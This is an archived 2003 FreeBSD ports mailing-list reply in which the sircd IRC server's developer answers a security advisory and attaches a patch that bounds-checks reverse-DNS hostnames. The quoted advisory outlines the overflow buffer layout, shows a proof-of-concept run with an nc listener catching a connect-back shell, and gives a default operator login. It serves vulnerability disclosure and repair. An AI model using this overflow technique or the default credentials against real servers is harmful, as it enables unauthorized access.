Skip site navigation (1)Skip section navigation (2)
Date:      Tue, 04 Feb 2003 10:35:08 +0000
From:      Zarjazz <zarjazz@barrysworld.com>
To:        =?ISO-8859-1?Q?Knud_Erik_H=F8jgaard?= <kain@ircop.dk>
Cc:        ports@freebsd.org
Subject:   Re: sircd buffer overflow
Message-ID:  <3E3F975C.9070109@barrysworld.com>
In-Reply-To: <002901c2cbd0$1ded9220$24029dd9@tuborg>
References:  <002901c2cbd0$1ded9220$24029dd9@tuborg>

next in thread | previous in thread | raw e-mail | index | archive | help
This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enig0C38CDF729303AEFC707DCD5
Content-Type: multipart/mixed;
 boundary="------------070609010800040607000708"

This is a multi-part message in MIME format.
--------------070609010800040607000708
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

Thanks for the info but I'd like to say that the BSD ports version of
sircd is / was nothing to do with me and v0.4.0 was the initial alpha
release and is now more than 1 year old compared to the current CVS tree
so someone has not been keeping the source upto date!

> II. DESCRIPTION
>
> a: Insufficient bounds checking leads to execution of arbitrary code.

Patch attached to sanity check the dns lookup however I see this more as
a bug than an exploit as you need root access on the system before you
actually edit /etc/hosts in the first place.

I would be interested to know if the current CVS version is affected in
the same way as a lot has change since the 0.4.x tree.

> b: Default oper account matching *!*@*

In all my releases I only ever included an example.conf file under docs/
so I can't take the blame for anyone running a server with an unaltered
config file :)

Zarjazz

Knud Erik Højgaard wrote:
> A heads up.. 
> 
> 
> ------------------------------------------------------------------------
> 
> I. BACKGROUND
> 
> According to the vendor "The 'sircd' project started as an idea from
> the QuakeNet IRC Network coding team to develop a completely new irc
> server that had none of the problems of the original ircd, such as
> instability, scalability issues, redundant, badly written code and
> other nasty things. "
> More info is available at http://www.sircd.org.
> 
> II. DESCRIPTION
> 
> a: Insufficient bounds checking leads to execution of arbitrary code. 
> b: Default oper account matching *!*@*
> 
> III. ANALYSIS
> 
> a:
> Upon checking the reverse dns of a connecting user, if the returned
> value is longer than a certain length a classic stack overflow occurs.
> 
> The buffer may be constructed as such:
> [94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode],
> leaving us with plenty of space both before and after eip to store our
> shellcode. 
> 
> The accompanying .sh script is a silly proof of concept. 
> Below is a fabricated copy of a typical run:
> 
> [shell 1]
> $ nc -l -v -p 10000
> listening on [any] 10000 ...
> 
> [shell 2]
> # ./sircd.sh 127.0.0.1
> 
> sircd 0.4.0 proof-of-concept, usage ./sircd.sh <ip-of-attacker>
> 
> UID check passed, backing up /etc/hosts
> Now connect to the sircd from 127.0.0.1
> Press a key and enter to restore /etc/hosts
> asd
> Game over man, game over
> #
> 
> [shell 3]
> $ sircd &
> [1] 75711
> $
> 
> =====================================
>  sircd:  v0.4.0 Alpha
>  Author(s)
>    Zarjazz (zarjazz@barrysworld.com)
> =====================================
> sircd initialized
> SSL initialized
> 
> $ BitchX 127.0.0.1
> [snip some bitchx output]
> [fi]  *** Welcome to the_server
> [fi]  *** Resolving IP 127.0.0.1
> --from here on the connection freezes.
> 
> [shell 2]
> fah
> Game over man, game over
> #
> 
> [shell 1]
> connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869
> id
> uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user)
> 
> b: type /oper bod bod bod in a connected irc-client.
> 
> IV. DETECTION
> 
> sircd-0.4.0 shipping with FreeBSD ports as well as from www.sircd.org 
> as per 03/02-03 is found to be vulnerable.
> 
> V. WORKAROUND
> 
> unknown
> 
> VI. VENDOR FIX
> 
> unknown
> 
> VII. CVE INFORMATION
> 
> unknown
> 
> VIII. DISCLOSURE TIMELINE
> 
> 03/02-02 zarjazz@barrysworld.com,ports@freebsd.org notified.
> 
> IX. CREDIT
> 
> Knud Erik Højgaard


--------------070609010800040607000708
Content-Type: text/plain;
 name="sircd.patch"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="sircd.patch"

diff -rubBN sircd-0.4.0/sircd/src/ircd_callbacks.c sircd-0.4.0.fix/sircd/src/ircd_callbacks.c
--- sircd-0.4.0/sircd/src/ircd_callbacks.c	Sat Feb  2 17:44:49 2002
+++ sircd-0.4.0.fix/sircd/src/ircd_callbacks.c	Tue Feb  4 10:12:37 2003
@@ -314,7 +314,7 @@
 	{
 		/* not cached, so do a dns lookup of the ip address */
 		struct hostent *host_ent = gethostbyaddr((char * ) &addr.sin_addr, sizeof(addr.sin_addr), AF_INET);
-		if (host_ent)
+		if (host_ent && host_ent->h_length < HOSTLEN) 
 			ip_tree->left = (void *) str_dup(host_ent->h_name);
 		else
 			ip_tree->left = (void *) str_dup(cl_ip);

--------------070609010800040607000708--

--------------enig0C38CDF729303AEFC707DCD5
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (MingW32)

iD8DBQE+P5diPx/nyuA99rgRAgFnAJ4/hTRCoihNONNatt0GVKNhbvPPVQCfYY3t
RuvNyXleBQHkTqNAW+BCVTE=
=DsDa
-----END PGP SIGNATURE-----

--------------enig0C38CDF729303AEFC707DCD5--


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-ports" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?3E3F975C.9070109>